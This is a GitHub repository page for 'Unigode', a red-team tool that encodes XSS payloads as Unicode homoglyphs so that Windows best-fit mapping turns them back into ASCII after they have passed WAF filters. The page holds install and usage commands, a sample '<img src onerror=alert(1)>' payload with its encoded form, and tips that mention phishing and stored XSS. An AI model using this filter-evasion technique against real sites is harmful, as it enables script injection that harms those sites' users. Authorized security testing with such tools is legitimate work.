Skip to content
/ unigode Public

Unicode payload obfuscator designed to exploit Windows' best-fit character mapping. It replaces ASCII characters with visually similar Unicode homoglyphs that are silently converted back on vulnerable systems — especially on Windows — making your payloads stealthy and WAF-resistant.

License

View license
0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Yasha-ops/unigode

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
go.mod
go.mod
 
 
main.go
main.go
 
 

Repository files navigation

🧬 Unigode

Unigode is a Unicode-based payload generator designed to evade WAFs and XSS filters by exploiting Windows' Best Fit Mapping and leveraging visually similar Unicode characters. Inspired by Orange Tsai's research on bypassing filter-based protections using charset quirks, Unigode transforms standard payloads into stealthy, executable versions that slip past naive filtering.

🚀 Features

  • 🔣 Encodes text using Best Fit Unicode substitutions
  • 🎭 Obfuscates JavaScript payloads while preserving functionality
  • 🧱 Effective against poorly configured WAFs and blacklists
  • 🧾 Supports inline input (--text) or file-based input (--file)
  • ⚡ Fast, minimal, binary-ready for red teaming

Installation

go install github.com/yasha-ops/unigode@latest

# OR 

git clone https://github.com/Yasha-ops/unigode.git
cd unigode
go build -o unigode .

Usage

unigode --text "Text to encode"
unigode --file payload.txt

Example

> ./unigode --text "<img src onerror=alert(1)>"
〈ǐmg śrc ơņℿrŗℴr‗ǎļėřʋ⌠₁)〉

Why does it work?

Windows' Best Fit Mapping automatically "normalizes" certain Unicode characters to their closest ASCII equivalents when using non-Unicode code pages (e.g., chcp 65001 vs 1252). This behavior can be abused to craft payloads that:

  • Appear harmless or unreadable to static filters
  • Get translated back to valid JavaScript on vulnerable backends
  • Bypass naive sanitization logic based on byte or char matching

This technique was notably weaponized by Orange Tsai to bypass SSRF and WAF protections via smart encoding tricks. Unigode brings this idea to the client-side XSS world with instant payload generation.

Pro tips

  • Combine with polyglot payloads or event handler tricks for full WAF bypass
  • Test across Windows/IIS setups using legacy encodings for full effect
  • Use in phishing, stored XSS, or CSP-locked contexts where character shape matters

Disclaimer

This tool is for educational and authorized security research purposes only. Unauthorized use against systems without consent is strictly forbidden.

License

This project is licensed under the Creative Commons Attribution-NonCommercial 4.0 International (CC BY-NC 4.0).
You are free to use, modify, and share — but commercial use is strictly prohibited.

About

Unicode payload obfuscator designed to exploit Windows' best-fit character mapping. It replaces ASCII characters with visually similar Unicode homoglyphs that are silently converted back on vulnerable systems — especially on Windows — making your payloads stealthy and WAF-resistant.

Resources

Readme

License

View license
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

4 tags

Packages

No packages published

Languages